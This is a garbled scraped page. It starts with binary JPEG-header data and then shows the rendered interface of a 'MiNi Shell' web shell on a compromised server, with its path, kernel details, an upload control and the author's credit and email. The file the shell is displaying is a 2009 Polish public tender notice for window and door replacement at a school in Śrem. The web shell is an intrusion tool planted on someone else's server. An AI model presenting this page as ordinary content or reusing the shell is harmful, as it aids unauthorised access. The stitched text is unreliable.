JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/122546-N-2009.html

<p class="kh_header"><b>Śrem: Wymiana stolarki okiennej i drzwiowej w budynku Gimnazjum nr 2
 im. Ks. Piotra Wawrzyniaka w Śremie</b><br>
<b>Numer ogłoszenia: 122546 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Nr 2 im. Ks. Piotra Wawrzyniaka , ul. Szkolna 4, 63-100 Śrem, woj. wielkopolskie, tel. 0-61 2830866, faks 0-61 2830866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.pl/gimniak (BIP)</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gimnazjum.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej i drzwiowej w budynku Gimnazjum nr 2
 im. Ks. Piotra Wawrzyniaka w Śremie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	demontaż drewnianej stolarki okiennej i drzwiowej,
b)	osadzenie stolarki okiennej - 255,537 m2  i drzwiowej drewnianej - 22,206 m2,
c)	uszczelnienie ościeżnic z murem pianką poliuretanową montażową,
d)	okładanie (szpachlowanie) ścian i słupów płytkami z betonu komórkowego grubości  6 cm na zaprawie cementowo wapiennej pod montaż podokienników wewnętrznych,
e)	osadzenie podokienników wewnętrznych z drewna klejonego,
f)	uzupełnienie tynków zaprawą cementowo - wapienną na ościeżnicach wewnątrz i zewnątrz szer. 15 cm,
g)	malowanie dwukrotne farbami emulsyjnymi tynków wewnętrznych ścian,
h)	malowanie ścian dwukrotne farbami olejnymi - lamperia,
i)	układanie tapet gładkich papierowych  na styk - uzupełnienie tapety do malowania.

Szczegółowy zakres robót określają : przedmiar robót oraz dokumentacja techniczna.


Zastosowane nazwy producentów i produktów ujęte w dokumentacji projektowej i przedmiarach robót będące przedmiotem zamówienia służą tylko 
i wyłącznie doprecyzowaniu przedmiotu zamówienia, a zamówienie należy wykonać z materiałów wskazanych w dokumentacji lub równoważnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> .        Wykonawca przystępujący do postępowania jest zobowiązany do   
             wniesienia wadium do dnia 22 maja 2009 r. do godz. 1045 w wysokości 
             10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100). 
                Wadium należy wnieść w pieniądzu na konto Gimnazjum nr 2 
                im. Ks. Piotra Wawrzyniaka w Śremie:
                          w SBL Śrem nr 21161011880013043320000001.

             Zamawiający dopuszcza również wniesienie wadium w formach 
             wskazanych w art. 45 ust. 6 Prawa zamówień publicznych. Oryginał 
             dowodu wniesienia wadium należy złożyć w Sekretariacie Gimnazjum 
              nr 2 im. Ks. Piotra Wawrzyniaka w Śremie do dnia 22 maja 2009 r.    
             godz. 1045 a potwierdzoną kopię należy załączyć do oferty lub    
             dostarczyć przed otwarciem ofert.

   Oferta, która nie będzie zabezpieczona wadium zostanie przez Zamawiającego odrzucona a Wykonawca wykluczony 
z udziału w postępowaniu.

            Zwrot oraz zatrzymanie wadium następuje zgodnie z art. 46 Prawa 
            zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 13.1. O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający 
          warunki udziału w postępowaniu określone w art. 22 Prawa zamówień 
          publicznych oraz niepodlegający wykluczeniu z postępowania na 
          podstawie art. 24 ww. ustawy, którzy:
a)	prowadzą działalność gospodarczą tożsamą z przedmiotem zamówienia 
i posiadają aktualne dokumenty, potwierdzające wymagane uprawnienia;
b)	nie zalegają ze składkami ZUS lub KRUS bądź uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji właściwego organu;
c)	nie zalegają z opłacaniem podatków i opłat bądź uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji właściwego organu;
d)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.:
- wykażą, że w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania 
   o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
   w tym okresie, wykonali należycie, co najmniej 2 roboty budowlane 
   odpowiadające swoim rodzajem robotom budowlanym stanowiącym  
   przedmiot zamówienia tj. roboty budowlane obejmujące łącznie prace 
   w zakresie wymiany stolarki budowlanej, o wartości każdej z robót, równej, 
   co najmniej 300 000,00 PLN,
- wykażą, że dysponują min. 1 osobą posiadającą uprawnienia do kierowania 
   robotami w specjalności konstrukcyjno- budowlanej zgodnie z wymogami     
   ustawy Prawo Budowlane, która jest wpisana na listę właściwej Izby   
   Samorządu Zawodowego.

e)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej 
      wykonanie zamówienia tj. Wykonawca posiada na koncie kwotę nie 
      mniejszą niż 30 % zaoferowanej ceny (może być wyciąg bankowy) lub 
      posiada zdolność kredytową w takiej wysokości.


13.2.  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana 
          w oparciu o oświadczenia wykonawcy o spełnianiu warunków 
          podmiotowych udziału w postępowaniu oraz dokumenty potwierdzające 
          spełnianie tych warunków.
          Ocena spełnienia warunków zostanie dokonana według formuły  
          spełnia/nie spełnia na podstawie załączonych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 14. W celu potwierdzenia spełniania warunków udziału w postępowaniu 
      wykonawca musi załączyć do oferty następujące dokumenty i oświadczenia:

14.1. Formularz ofertowy - Załącznik Nr 1

14.2. Kosztorys ofertowy szczegółowy dla robót wymienionych w pkt. 4 
          w rozbiciu wg układu przedmiaru robót oraz robót nie ujętych 
          w przedmiarze, a niezbędnych do wykonania całości przedmiotu umowy. 

14.3. Oświadczenia (Załącznik Nr 2), że Wykonawca:
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia;
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych;
5)	uważa się za związanego z ofertą w ciągu okresu jej ważności określonej w pkt. 17 niniejszej specyfikacji, że zobowiązuje się, jeżeli jego oferta zostanie uznana za najkorzystniejszą, do zawarcia umowy w terminie związania ofertą za cenę proponowaną w ofercie, wg wzoru umowy stanowiącego Załącznik Nr 3 do SIWZ.

14.4. Odpis z właściwego rejestru lub zaświadczenie z ewidencji działalności 
          gospodarczej potwierdzające, że działalność prowadzona przez 
          Wykonawcę odpowiada przedmiotowi zamówienia, wystawiony nie 
          wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

14.5. Aktualne zaświadczenie właściwego oddziału ZUS lub KRUS 
          potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz 
          składek na ubezpieczenie społeczne lub zdrowotne lub zaświadczenie, że 
          uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
          raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji 
          właściwego organu, wystawione nie wcześniej niż 3 miesiące przed 
          upływem terminu składania ofert.

14.6. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego 
          potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat
          lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, 
          odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu 
          w całości wykonania decyzji właściwego organu, wystawione nie 
          wcześniej niż 3 miesiące przed upływem terminu składania ofert.

14.7.  Aktualne zaświadczenie z Krajowego Rejestru Karnego w zakresie 
          określonym w art. 24 ust. 1 pkt. 4 - 9 Prawa zamówień publicznych, 
          wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
          składania ofert.

14.8.  Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu 
          zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, 
          doświadczenia i wykształcenia niezbędnych do wykonywania 
          zamówienia, a także zakresu wykonywanych przez nich czynności 
          (ksero uprawnień).

14.9.  Wykaz wykonanych w ostatnich pięciu latach min. dwóch podobnych, co 
           do zakresu i wielkości zadań, z podaniem ich wartości oraz daty i miejsca 
           wykonania robót wraz z załączeniem dokumentów potwierdzających, że 
           roboty te zostały wykonane należycie. Oznacza to, że wykonawca musi 
           przedłożyć dokumenty potwierdzające należyte wykonanie wykazanych 
           robót. 

14.10.  Dokumenty stwierdzające, że osoby, które będą uczestniczyć 
             w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli 
             ustawy nakładają obowiązek posiadania takich uprawnień. 

14.11.  Informację z banku, w którym Wykonawca posiada podstawowy 
             rachunek bankowy, potwierdzającą wysokość posiadanych środków 
             finansowych lub zdolność kredytową Wykonawcy, wystawioną nie 
             wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
             Z dokumentu musi wynikać, że Wykonawca posiada na koncie kwotę 
             nie mniejszą niż 30 % zaoferowanej ceny (może być wyciąg bankowy) 
             lub posiada zdolność kredytową w takiej wysokości.

 14.12. Dowód wpłacenia (złożenia) wadium - kserokopię lub okazanie 
             dowodu wpłaty w trakcie otwierania kopert z ofertami. 

14.13.  Wykonawca akceptuje wzór umowy poprzez jego podpisanie na ostatniej 
             stronie w miejscu przeznaczonym na podpis Wykonawcy
             oraz dołącza do sporządzonej oferty wypełniając swoje propozycję 
             w: § 4 ust. 7 § 5 ust. 1,6 § 8 ust.2,4,5,6. Nie podpisanie wzoru umowy 
             skutkować będzie odrzuceniem oferty.

14.14.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  
             Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 
             14.4., 14.5., 14.6. i 14.7. niniejszej specyfikacji, składa dokument lub 
             dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce 
             zamieszkania, potwierdzające odpowiednio, że:
	1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	2)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
	3)  nie zalega z uiszczaniem podatków, opłat lub składek na 
          ubezpieczenie społeczne lub zdrowotne albo, że uzyskał 
          przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
          zaległych płatności lub wstrzymanie w całości wykonania decyzji 
          właściwego organu.

14.15.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma 
             siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, 
             o których mowa w pkt. 14.4., 14.5., 14.6. i 14.7., zastępuje się je 
             dokumentem zawierającym oświadczenie złożone przed notariuszem, 
             właściwym organem sądowym, administracyjnym albo organem 
             samorządu zawodowego lub gospodarczego odpowiednio kraju 
             pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub 
             miejsce zamieszkania. 

14.16.  Do terminów wystawienia dokumentów, o których mowa w pkt. 14.14 
             i 14.15 stosuje się odpowiednio terminy o których mowa w pkt. 14.4., 
             14.5., 14.6. i 14.7. 
             Składane dokumenty muszą zachować aktualność oraz być 
             zgodne z rozporządzeniem Prezesa Rady Ministrów 
             z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich   
             może żądać zamawiający od wykonawcy, oraz form, w jakich te     
             dokumenty mogą być składane / Dz. U. z 2006 r. Nr 87, poz. 605 /.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.republika.pl/gimniak (BIP).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum nr 2 im. Ks. Piotra Wawrzyniaka ul. Szkolna 4, 63-100 Śrem.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 10:45, miejsce: Gimnazjum nr 2 im. Ks. Piotra Wawrzyniaka ul. Szkolna 4, 63-100 Śrem (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com